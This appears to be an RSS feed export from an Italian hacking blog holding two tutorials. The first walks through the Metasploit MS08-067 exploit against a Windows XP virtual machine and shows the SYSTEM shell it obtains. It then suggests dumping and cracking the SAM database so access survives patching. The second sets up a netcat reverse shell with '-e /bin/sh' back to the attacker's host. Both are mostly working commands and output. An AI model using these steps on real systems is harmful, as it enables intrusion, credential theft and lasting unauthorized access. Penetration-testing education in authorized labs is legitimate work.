Guerra Fredda dell&#8217;Open-Source' a FriendFeed" alt="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a FriendFeed" /></a></div>
<!-- Social Bookmarking Reloaded END -->]]></content:encoded>
			<wfw:commentRss>http://www.pillolhacking.net/2009/02/02/la-guerra-fredda-dellopen-source/feed/</wfw:commentRss>
		<slash:comments>18</slash:comments>
		</item>
		<item>
		<title>Hackerare Windows con Metasploit</title>
		<link>http://www.pillolhacking.net/2008/11/26/hackerare-windows-con-metasploit/</link>
		<comments>http://www.pillolhacking.net/2008/11/26/hackerare-windows-con-metasploit/#comments</comments>
		<pubDate>Wed, 26 Nov 2008 13:29:08 +0000</pubDate>
		<dc:creator>Angelo Righi</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Tutorial]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.pillolhacking.net/2008/11/26/hackerare-windows-con-metasploit/</guid>
		<description><![CDATA[Qualche settimana fa ci siamo imbattuti in un grave bug di Windows che Microsoft ha provveduto a risolvere rilasciando una patch straordinaria. In questo tutorial dimostro come sia possibile attaccare un sistema Windows vulnerabile a questo bug. Perchè l&#8217;attacco abbia successo si devono presentare le seguenti condizioni: Il computer non deve essere patchato contro la [...]]]></description>
			<content:encoded><![CDATA[<p>Qualche settimana fa ci siamo imbattuti in un <a href="http://www.pillolhacking.net/2008/10/25/grave-falla-in-windows-patch-straordinaria-da-installare-subito/ ">grave bug di Windows</a> che Microsoft ha provveduto a risolvere rilasciando una patch straordinaria.<br />
In questo tutorial dimostro come sia possibile attaccare un sistema Windows vulnerabile a questo bug.</p>
<p>Perchè l&#8217;attacco abbia successo si devono presentare le seguenti condizioni:</p>
<ul>
<li>Il computer non deve essere patchato contro la vulnerabilità <a href="http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx">MS08-067</a></li>
<li>Il computer deve permettere connessioni in entrata sulla porta 445</li>
</ul>
<p>Se queste due condizioni non sono presenti il sistema si può considerare sicuro. Per essere sicuri di essere invulnerabili a questo attacco installare la patch MS08-067; in alternativa inibire l&#8217;accesso alla porta 445 tramite firewall.</p>
<p>L&#8217;attacco viene portato utilizzando il <a id="nx17" title="Metasploit Framework" href="http://www.pillolhacking.net/2008/11/24/introduzione-a-metasploit/">Metasploit Framework</a>, versione 3.3-dev. Come piattaforma ho utilizzato Back|Track3, una distribuzione Linux appositamente studiata per i penetration test.</p>
<p><strong>Aggiornare Metasploit<br />
</strong><br />
Nella versione BT3 appena masterizzata l&#8217;exploit che voglio usare non c&#8217;è, quindi bisogna aggiornare Metasploit Framework tramite subversion, con il comando:</p>
<pre>svn update</pre>
<p>da eseguire nella directory dove si trova il Framework 3 di Metasploit.</p>
<p><strong>Preparazione dell&#8217;attacco<br />
</strong><br />
Con il comando ifconfig mi sincero del mio indirizzo ip:</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;">bt framework3 <span style="color: #666666; font-style: italic;"># ifconfig</span>
eth0      Link encap:Ethernet  HWaddr 00:0C:<span style="color: #000000;">29</span>:AC:<span style="color: #000000;">13</span>:6D
inet addr:192.168.132.129  Bcast:192.168.132.255  Mask:255.255.255.0
UP BROADCAST NOTRAILERS RUNNING MULTICAST  MTU:<span style="color: #000000;">1500</span>  Metric:<span style="color: #000000;">1</span>
RX packets:<span style="color: #000000;">5909</span> errors:<span style="color: #000000;">0</span> dropped:<span style="color: #000000;">0</span> overruns:<span style="color: #000000;">0</span> frame:<span style="color: #000000;">0</span>
TX packets:<span style="color: #000000;">5390</span> errors:<span style="color: #000000;">0</span> dropped:<span style="color: #000000;">0</span> overruns:<span style="color: #000000;">0</span> carrier:<span style="color: #000000;">0</span>
collisions:<span style="color: #000000;">0</span> txqueuelen:<span style="color: #000000;">1000</span>
RX bytes:<span style="color: #000000;">8686599</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000;">8.2</span> MiB<span style="color: #7a0874; font-weight: bold;">&#41;</span>  TX bytes:<span style="color: #000000;">322667</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000;">315.1</span> KiB<span style="color: #7a0874; font-weight: bold;">&#41;</span>
Interrupt:<span style="color: #000000;">18</span> Base address:0x1080</pre></div></div>

<p>Come si vede il mio indirizzo è 192.168.132.129. La macchina target, quella che andrò ad attaccare è un Windows XP Pro vulnerabile a questo attacco e con la porta 445 accessibile. Il suo indirizzo è 192.168.132.128. Entrambe le macchine sono virtuali, emulate su VMWare.</p>
<p>Metasploit Framework dispone di diverse interfacce: quella che prediligo è msfconsole, ed è quella che utilizzerò in questo tutorial. Per accedere a msfconsole basta digitare il comando sulla linea di comando per entrare nel prompt msf:</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;">bt framework3 <span style="color: #666666; font-style: italic;"># msfconsole</span>
&nbsp;
=<span style="color: #7a0874; font-weight: bold;">&#91;</span> msf v3.3-dev
+ <span style="color: #660033;">--</span> <span style="color: #660033;">--</span>=<span style="color: #7a0874; font-weight: bold;">&#91;</span> <span style="color: #000000;">294</span> exploits - <span style="color: #000000;">124</span> payloads
+ <span style="color: #660033;">--</span> <span style="color: #660033;">--</span>=<span style="color: #7a0874; font-weight: bold;">&#91;</span> <span style="color: #000000;">17</span> encoders - <span style="color: #000000;">6</span> nops
=<span style="color: #7a0874; font-weight: bold;">&#91;</span> <span style="color: #000000;">58</span> aux</pre></div></div>

<p>Per visualizzare la lista degli exploit disponibili uso il comando show exploits; di seguito mostro uno stralcio, dove viene visualizzato quello che mi interessa:<br />
msf &gt; show exploits</p>

<div class="wp_syntax"><div class="code"><pre class="dos" style="font-family:monospace;">Exploits
========
&nbsp;
Name                                                      Description
----                                                      -----------
&nbsp;
windows/smb/ms06_066_nwwks                                Microsoft Services MS06-066 nwwks.dll
<span style="color: #33cc33;">&lt;</span>strong<span style="color: #33cc33;">&gt;</span>windows/smb/ms08_067_netapi                               Microsoft Server Service Relative Path Stack Corruption<span style="color: #33cc33;">&lt;</span>/strong<span style="color: #33cc33;">&gt;</span>
windows/smb/msdns_zonename                                Microsoft DNS RPC Service extractQuotedChar<span style="color: #33cc33;">()</span> Overflow <span style="color: #33cc33;">(</span>SMB<span style="color: #33cc33;">)</span>
windows/smb/psexec                                        Microsoft Windows Authenticated User Code Execution</pre></div></div>

<p>Ho trovato l&#8217;exploit: decido di impiegarlo:</p>
<p>msf &gt; use windows/smb/ms08_067_netapi</p>
<p>visualizzo la lista delle opzioni:</p>

<div class="wp_syntax"><div class="code"><pre class="dos" style="font-family:monospace;">msf exploit<span style="color: #33cc33;">(</span>ms08_067_netapi<span style="color: #33cc33;">)</span> <span style="color: #33cc33;">&amp;</span>gt; show options
&nbsp;
Module options:
&nbsp;
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       <span style="color: #b1b100; font-weight: bold;">Set</span> the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use <span style="color: #33cc33;">(</span>BROWSER, SRVSVC<span style="color: #33cc33;">)</span>
&nbsp;
Exploit target:
&nbsp;
Id  Name
--  ----
0   Automatic Targeting</pre></div></div>

<p>Ci sono tre parametri obbligatori: RHOST (l&#8217;indirizzo del target), la porta Tcp (445) e il servizio da sfruttare come vettore (BROWSER); lascio gli ultimi due di default e inserisco l&#8217;Ip del computer che voglio attaccare:</p>

<div class="wp_syntax"><div class="code"><pre class="dos" style="font-family:monospace;">msf exploit<span style="color: #33cc33;">(</span>ms08_067_netapi<span style="color: #33cc33;">)</span> <span style="color: #33cc33;">&amp;</span>gt; <span style="color: #b1b100; font-weight: bold;">set</span> RHOST 192.168.132.128
RHOST =<span style="color: #33cc33;">&amp;</span>gt; 192.168.132.128</pre></div></div>

<p>Il target non va specificato, in quanto viene selezionato automaticamente (Automatic Targeting)</p>
<p>Ora devo decidere cosa fare se l&#8217;exploit va a buon fine. Metasploit mette a disposizione diversi payloads, ovvero diverse opzioni dalla semplice shell su porta Tcp, alla connessione inversa, al server VNC. In questo caso scelgo la shell su port Tcp, scelta classica:</p>

<div class="wp_syntax"><div class="code"><pre class="dos" style="font-family:monospace;">msf exploit<span style="color: #33cc33;">(</span>ms08_067_netapi<span style="color: #33cc33;">)</span> <span style="color: #33cc33;">&amp;</span>gt; show payloads
&nbsp;
Compatible payloads
===================
&nbsp;
Name                                            Description
----                                            -----------
generic/debug_trap                              Generic x86 Debug Trap
generic/debug_trap/bind_ipv6_tcp                Generic x86 Debug Trap, Bind TCP Stager <span style="color: #33cc33;">(</span>IPv6<span style="color: #33cc33;">)</span>
&nbsp;
...
&nbsp;
windows/shell/bind_tcp                          Windows Command Shell, Bind TCP Stager
windows/shell/reverse_ipv6_tcp                  Windows Command Shell, Reverse TCP Stager <span style="color: #33cc33;">(</span>IPv6<span style="color: #33cc33;">)</span>
&nbsp;
...
&nbsp;
msf exploit<span style="color: #33cc33;">(</span>ms08_067_netapi<span style="color: #33cc33;">)</span> <span style="color: #33cc33;">&amp;</span>gt; <span style="color: #b1b100; font-weight: bold;">set</span> PAYLOAD windows/shell/bind_tcp
PAYLOAD =<span style="color: #33cc33;">&amp;</span>gt; windows/shell/bind_tcp</pre></div></div>

<p>Ecco fatto: l&#8217;exploit è configurato. Ho scelto l&#8217;exploit ms08_067 che colpisce Windows senza l&#8217;aggiornamento relativo; ho settato l&#8217;indirizzo del target da attaccare ovvero RHOST 192.168.132.128; infine ho scelto il payload bind_tcp: se l&#8217;exploit andrà a buon fine potrò collegarmi (lo farà automaticamente) con una shell Windows su una porta Tcp  della macchina remota. Decido di non cambiare la porta Tcp e lasciare il valore di default: 4444.</p>
<p>A questo punto non resta che lanciare l&#8217;attacco, con il comando exploit:</p>

<div class="wp_syntax"><div class="code"><pre class="dos" style="font-family:monospace;">msf exploit<span style="color: #33cc33;">(</span>ms08_067_netapi<span style="color: #33cc33;">)</span> <span style="color: #33cc33;">&amp;</span>gt; exploit
&nbsp;
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:Italian
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Sending stage <span style="color: #33cc33;">(</span>474 bytes<span style="color: #33cc33;">)</span>
[*] Command shell session 1 opened <span style="color: #33cc33;">(</span>192.168.132.129:55761 -<span style="color: #33cc33;">&amp;</span>gt; 192.168.132.128:4444<span style="color: #33cc33;">)</span>
&nbsp;
Microsoft Windows XP [Versione 5.1.2600]
<span style="color: #33cc33;">(</span>C<span style="color: #33cc33;">)</span> Copyright 1985-2001 Microsoft Corp.
&nbsp;
C:\WINDOWS\system32<span style="color: #33cc33;">&amp;</span>gt;ipconfig
ipconfig
&nbsp;
Configurazione IP di Windows
&nbsp;
Scheda Ethernet Connessione alla rete locale <span style="color: #33cc33;">(</span>LAN<span style="color: #33cc33;">)</span>:
&nbsp;
Suffisso DNS specifico per connessione: localdomain
Indirizzo IP. . . . . . . . . . . . . : <span style="color: #b100b1; font-weight: bold;">192.168.132.128</span>
Subnet mask . . . . . . . . . . . . . : <span style="color: #b100b1; font-weight: bold;">255.255.255.0</span>
Gateway predefinito . . . . . . . . . : <span style="color: #b100b1; font-weight: bold;">192.168.132.2</span></pre></div></div>

<p>Come si vede l&#8217;attacco è andato a segno. Tramite la vulnerabilità Metasploit ha inviato un payload con una shellcode in grado di aprire la porta Tcp 4444 sulla macchina Windows e mi ha permesso di collegarmi ad una shell dei comandi.<br />
Quindi mi sono torvato un prompt dei comandi Windows sotto le mani! Ho eseguito ipconfig per mostrare l&#8217;Ip, che effettiavamente è quello della macchina che volevo attaccare.</p>
<p>A questo punto ho l&#8217;accesso completo con privilegi SYSTEM. Posso fare qualsiasi cosa.<br />
Ho avuto l&#8217;accesso completo senza dover conoscere nessuna password. Ora posso prelevare il <a href="http://www.pillolhacking.net/2007/01/04/come-craccare-le-password-di-windows/ ">SAM database e craccarlo</a> comodamente per poter rientrare in seguito con l&#8217;account di amministratore, senza dover rifare l&#8217;attacco: se il bug verrà patchato avrò comunque l&#8217;accesso garantito.</p>
<!-- Social Bookmarking Reloaded BEGIN --><div class="social_bookmark"><em>Segnala presso:</em><br /><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://del.icio.us/post?url=http://www.pillolhacking.net/2008/11/26/hackerare-windows-con-metasploit/&amp;title=Hackerare+Windows+con+Metasploit" title="Aggiungi 'Hackerare Windows con Metasploit' a Del.icio.us"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/delicious.png" title="Aggiungi 'Hackerare Windows con Metasploit' a Del.icio.us" alt="Aggiungi 'Hackerare Windows con Metasploit' a Del.icio.us" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://digg.com/submit?phase=2&amp;url=http://www.pillolhacking.net/2008/11/26/hackerare-windows-con-metasploit/&amp;title=Hackerare+Windows+con+Metasploit" title="Aggiungi 'Hackerare Windows con Metasploit' a digg"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/digg.png" title="Aggiungi 'Hackerare Windows con Metasploit' a digg" alt="Aggiungi 'Hackerare Windows con Metasploit' a digg" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technorati.com/faves?add=http://www.pillolhacking.net/2008/11/26/hackerare-windows-con-metasploit/" title="Aggiungi 'Hackerare Windows con Metasploit' a Technorati"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technorati.png" title="Aggiungi 'Hackerare Windows con Metasploit' a Technorati" alt="Aggiungi 'Hackerare Windows con Metasploit' a Technorati" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.pillolhacking.net/2008/11/26/hackerare-windows-con-metasploit/&amp;title=Hackerare+Windows+con+Metasploit" title="Aggiungi 'Hackerare Windows con Metasploit' a Google Bookmarks"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/google.png" title="Aggiungi 'Hackerare Windows con Metasploit' a Google Bookmarks" alt="Aggiungi 'Hackerare Windows con Metasploit' a Google Bookmarks" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://segnalo.alice.it/post.html.php?url=http://www.pillolhacking.net/2008/11/26/hackerare-windows-con-metasploit/&amp;title=Hackerare+Windows+con+Metasploit" title="Aggiungi 'Hackerare Windows con Metasploit' a Segnalo"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/segnalo.png" title="Aggiungi 'Hackerare Windows con Metasploit' a Segnalo" alt="Aggiungi 'Hackerare Windows con Metasploit' a Segnalo" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://oknotizie.alice.it/post?url=http://www.pillolhacking.net/2008/11/26/hackerare-windows-con-metasploit/&amp;title=Hackerare+Windows+con+Metasploit" title="Aggiungi 'Hackerare Windows con Metasploit' a OKnotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/oknotizie.gif" title="Aggiungi 'Hackerare Windows con Metasploit' a OKnotizie" alt="Aggiungi 'Hackerare Windows con Metasploit' a OKnotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.diggita.it/submit.php?title=Hackerare+Windows+con+Metasploit&amp;url=http://www.pillolhacking.net/2008/11/26/hackerare-windows-con-metasploit/" title="Aggiungi 'Hackerare Windows con Metasploit' a Diggita"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/diggita.png" title="Aggiungi 'Hackerare Windows con Metasploit' a Diggita" alt="Aggiungi 'Hackerare Windows con Metasploit' a Diggita" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.facebook.com/share.php?u=http://www.pillolhacking.net/2008/11/26/hackerare-windows-con-metasploit/&amp;t=Hackerare+Windows+con+Metasploit" title="Aggiungi 'Hackerare Windows con Metasploit' a FaceBook"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/facebook.png" title="Aggiungi 'Hackerare Windows con Metasploit' a FaceBook" alt="Aggiungi 'Hackerare Windows con Metasploit' a FaceBook" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.upnews.it/submit?url=http://www.pillolhacking.net/2008/11/26/hackerare-windows-con-metasploit/&amp;title=Hackerare+Windows+con+Metasploit" title="Aggiungi 'Hackerare Windows con Metasploit' a Upnews"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/upnews.png" title="Aggiungi 'Hackerare Windows con Metasploit' a Upnews" alt="Aggiungi 'Hackerare Windows con Metasploit' a Upnews" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://notizieflash.com/submit.php?title=Hackerare+Windows+con+Metasploit&amp;url=http://www.pillolhacking.net/2008/11/26/hackerare-windows-con-metasploit/" title="Aggiungi 'Hackerare Windows con Metasploit' a NotizieFlash"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/notizieflash.png" title="Aggiungi 'Hackerare Windows con Metasploit' a NotizieFlash" alt="Aggiungi 'Hackerare Windows con Metasploit' a NotizieFlash" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://twitter.com/home?status=http://www.pillolhacking.net/2008/11/26/hackerare-windows-con-metasploit/" title="Aggiungi 'Hackerare Windows con Metasploit' a Twitter"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/twitter.png" title="Aggiungi 'Hackerare Windows con Metasploit' a Twitter" alt="Aggiungi 'Hackerare Windows con Metasploit' a Twitter" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technotizie.it/posta_ok?action=f2&amp;title=Hackerare+Windows+con+Metasploit&amp;url=http://www.pillolhacking.net/2008/11/26/hackerare-windows-con-metasploit/" title="Aggiungi 'Hackerare Windows con Metasploit' a Technotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technotizie.png" title="Aggiungi 'Hackerare Windows con Metasploit' a Technotizie" alt="Aggiungi 'Hackerare Windows con Metasploit' a Technotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://friendfeed.com/share/bookmarklet/frame#title=Hackerare+Windows+con+Metasploit&amp;url=http://www.pillolhacking.net/2008/11/26/hackerare-windows-con-metasploit/" title="Aggiungi 'Hackerare Windows con Metasploit' a FriendFeed"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/friendfeed.png" title="Aggiungi 'Hackerare Windows con Metasploit' a FriendFeed" alt="Aggiungi 'Hackerare Windows con Metasploit' a FriendFeed" /></a></div>
<!-- Social Bookmarking Reloaded END -->]]></content:encoded>
			<wfw:commentRss>http://www.pillolhacking.net/2008/11/26/hackerare-windows-con-metasploit/feed/</wfw:commentRss>
		<slash:comments>13</slash:comments>
		</item>
		<item>
		<title>Back Channel con Netcat</title>
		<link>http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/</link>
		<comments>http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/#comments</comments>
		<pubDate>Tue, 25 Nov 2008 13:36:24 +0000</pubDate>
		<dc:creator>Angelo Righi</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Networking]]></category>
		<category><![CDATA[Tutorial]]></category>

		<guid isPermaLink="false">http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/</guid>
		<description><![CDATA[Abbiamo visto come creare una backdoor con Netcat: si apre una porta Tcp e ci collega la shell di sistema, quindi ci si collega da remoto. Però non sempre le cose vanno così lisce. Per esempio il firewall potrebbe rifiutare tentativi di connessione da fuori. In questo caso per poter prendere il controllo del sistema [...]]]></description>
			<content:encoded><![CDATA[<p>Abbiamo visto <a href="http://www.pillolhacking.net/2008/11/10/creare-una-backdoor-con-netcat/" title="come creare una backdoor con Netcat" id="a-..">come creare una backdoor con Netcat</a>: si apre una porta Tcp e ci collega la shell di sistema, quindi ci si collega da remoto.<br />
Però non sempre le cose vanno così lisce. Per esempio il firewall potrebbe rifiutare tentativi di connessione da fuori.</p>
<p>In questo caso per poter prendere il controllo del sistema si può utilizzare un back-channel. Il back-channel è un canale che parte dalla macchina remota e termina sul nostro computer.Con un back-channel sarà l&#8217;host sotto attacco a collegarsi a noi, e sul nostro computer apparirà la shell del computer remoto.</p>
<p>Per spiegare come fare a utilizzare netcat come back-channel mostro un esempio sfruttando due computer: il computer dell&#8217;hacker su cui gira Windows XP, e la quello della vittima su cui invece è installato Linux Ubuntu.</p>
<p>La macchina dell&#8217;attacker ha l&#8217;indirizzo Ip 192.168.132.1, la vittima 192.168.132.130.</p>
<p>Per prima cosa apro il prompt dei comandi e metto netcat in ascolto sulla porta 9999:</p>
<pre>
C:\Documents and Settings\angelor&gt;nc -l -p 9999 -vv</pre>
<p>l&#8217;opzione -l mette netcat in ascolto, il parametro -p specifica la porta Tcp.</p>
<p>Sull&#8217;altro computer su cui come ho detto gira Linux Ubuntu, digito il seguente comando:</p>
<pre>angelor@daikengo:~$ nc 192.168.132.1 9999 -e /bin/sh -vv</pre>
<p>nei parametri viene specificato l&#8217;Ip del computer dell&#8217;attacker (192.168.132.1) e la porta; con l&#8217;opzione -e si esegue la shell di sistema /bin/sh. Però l&#8217;output verrà indirizzato sul canale aperto Tcp aperto con l&#8217;altro computer e non in locale:</p>
<pre>(UNKNOWN) [192.168.132.1] 9999 (?) open</pre>
<p>questo messaggio indica che il computer dell&#8217;hacker ha accettato la connessione. Dall&#8217;altra parte, sul computer dell&#8217;hacker:</p>
<pre>192.168.132.130: inverse host lookup failed: h_errno 11004: NO_DATA

connect to [192.168.132.1] from (UNKNOWN) [192.168.132.130] 36156: NO_DATA</pre>
<p>questo indica che il computer remoto (Ubuntu, 192.168.132.130) ha aperto una connessione verso questo computer. A questo punto non rimane che digitare comandi: comandi Linux naturalmente!</p>
<pre>
wUSER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
angelor  pts/0    :0.0             22:15   23.00s  0.32s  0.00s sh

uname -a
Linux daikengo 2.6.24-19-generic #1 SMP Wed Jun 18 22:43:41 UTC 2008 i686 GNU/Linux

ls / -al
drwxr-xr-x  21 root root  4096 2008-08-24 17:52 .
drwxr-xr-x  21 root root  4096 2008-08-24 17:52 ..
drwxr-xr-x   2 root root  4096 2008-08-24 17:53 bin
drwxr-xr-x   3 root root  4096 2008-08-24 17:52 boot
lrwxrwxrwx   1 root root    11 2008-08-24 17:43 cdrom -&gt; media/cdrom
drwxr-xr-x  10 root root 13700 2008-11-25 10:14 dev
drwxr-xr-x 120 root root  4096 2008-11-25 10:15 etc
drwxr-xr-x   3 root root  4096 2008-08-24 17:48 home
drwxr-xr-x   2 root root  4096 2008-07-02 12:16 initrd
lrwxrwxrwx   1 root root    33 2008-08-24 17:52 initrd.img -&gt; boot/initrd.img-2.6.24-19-generic
drwxr-xr-x  16 root root  4096 2008-08-24 17:53 lib
drwx------   2 root root 16384 2008-08-24 17:43 lost+found
drwxr-xr-x   4 root root  4096 2008-07-02 12:16 media
drwxr-xr-x   2 root root  4096 2008-04-15 07:53 mnt
drwxr-xr-x   2 root root  4096 2008-07-02 12:16 opt
dr-xr-xr-x 116 root root     0 2008-11-25 10:13 proc
drwxr-xr-x   3 root root  4096 2008-08-24 17:52 root
drwxr-xr-x   2 root root  4096 2008-08-24 17:53 sbin
drwxr-xr-x   2 root root  4096 2008-07-02 12:16 srv
drwxr-xr-x  12 root root     0 2008-11-25 10:13 sys
drwxrwxrwt  13 root root  4096 2008-11-25 10:19 tmp
drwxr-xr-x  11 root root  4096 2008-07-02 12:18 usr
drwxr-xr-x  15 root root  4096 2008-07-02 12:34 var
lrwxrwxrwx   1 root root    30 2008-08-24 17:52 vmlinuz -&gt; boot/vmlinuz-2.6.24-19-generic</pre>
<p>Naturalmente tutto questo funziona se il firewall permette connessioni in uscita (in genere lo permette).</p>
<p>Questo articolo fa parte della serie &#8220;<a href="http://www.pillolhacking.net/2008/09/26/le-sette-vite-di-netcat/" id="y459" title="Le 7 Vite di Netcat">Le 7 Vite di Netcat</a>&#8220;. Potrai trovare altre informazioni su Netcat negli altri articoli della serie:</p>
<ul>
<li><a href="http://www.pillolhacking.net/2008/10/02/leggere-gli-header-http-e-le-pagine-web-con-netcat/" title="Leggere gli header HTTP e le pagine Web con Netcat" id="p1mn">Leggere gli header HTTP e le pagine Web con Netcat</a></li>
</ul>
<ul>
<li>  <a href="http://www.pillolhacking.net/2008/10/07/leggere-la-posta-elettronica-con-netcat/" title="Leggere la posta elettronica con Netcat" id="c6sn">Leggere la posta elettronica con Netcat</a></li>
</ul>
<ul>
<li>  <a href="http://www.pillolhacking.net/2008/10/20/inviare-email-con-netcat/" title="Inviare email con Netcat" id="ikhx">Inviare email con Netcat</a></li>
</ul>
<ul>
<li>  <a href="http://www.pillolhacking.net/2008/10/24/netcat-come-scanner/" title="Netcat come scanner" id="ar3p">Netcat come scanner</a></li>
</ul>
<ul>
<li>  <a href="http://www.pillolhacking.net/2008/11/06/trasferire-file-con-netcat/" title="Trasferire file con Netcat" id="bkqz">Trasferire file con Netcat</a></li>
</ul>
<ul>
<li>  <a href="http://www.pillolhacking.net/2008/11/10/creare-una-backdoor-con-netcat/" title="Creare una backdoor con Netcat" id="h:vr">Creare una backdoor con Netcat</a></li>
</ul>
<ul>
<li>  Back Channel con Netcat</li>
</ul>
<!-- Social Bookmarking Reloaded BEGIN --><div class="social_bookmark"><em>Segnala presso:</em><br /><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://del.icio.us/post?url=http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/&amp;title=Back+Channel+con+Netcat" title="Aggiungi 'Back Channel con Netcat' a Del.icio.us"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/delicious.png" title="Aggiungi 'Back Channel con Netcat' a Del.icio.us" alt="Aggiungi 'Back Channel con Netcat' a Del.icio.us" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://digg.com/submit?phase=2&amp;url=http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/&amp;title=Back+Channel+con+Netcat" title="Aggiungi 'Back Channel con Netcat' a digg"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/digg.png" title="Aggiungi 'Back Channel con Netcat' a digg" alt="Aggiungi 'Back Channel con Netcat' a digg" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technorati.com/faves?add=http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/" title="Aggiungi 'Back Channel con Netcat' a Technorati"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technorati.png" title="Aggiungi 'Back Channel con Netcat' a Technorati" alt="Aggiungi 'Back Channel con Netcat' a Technorati" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/&amp;title=Back+Channel+con+Netcat" title="Aggiungi 'Back Channel con Netcat' a Google Bookmarks"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/google.png" title="Aggiungi 'Back Channel con Netcat' a Google Bookmarks" alt="Aggiungi 'Back Channel con Netcat' a Google Bookmarks" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://segnalo.alice.it/post.html.php?url=http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/&amp;title=Back+Channel+con+Netcat" title="Aggiungi 'Back Channel con Netcat' a Segnalo"><img 